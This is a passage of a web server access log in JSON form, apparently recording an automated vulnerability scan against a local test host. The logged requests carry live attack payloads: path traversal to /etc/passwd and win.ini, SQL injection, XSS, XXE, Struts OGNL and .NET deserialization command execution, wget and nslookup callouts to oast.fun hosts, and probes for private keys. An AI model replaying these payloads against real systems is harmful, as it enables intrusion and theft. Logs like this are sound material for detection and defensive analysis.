+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup c9v8h88smpv8c1ig07h05eqguujfjrnw8.oast.fun\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.237","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apc.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.229","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.234","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.238","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://c9v8h8gsmpv8c1qg07h0jnpy3n5nmb15a.oast.fun","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boafrm/formSysCmd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.226","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.086","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/297MTqEfnceL5ZiXEcU5nJIcZ4y/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.074","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_pvt/service.pwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.253","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.242","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.244","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.258","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.090","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.093","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.099","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.107","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.097","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.240","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.108","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var 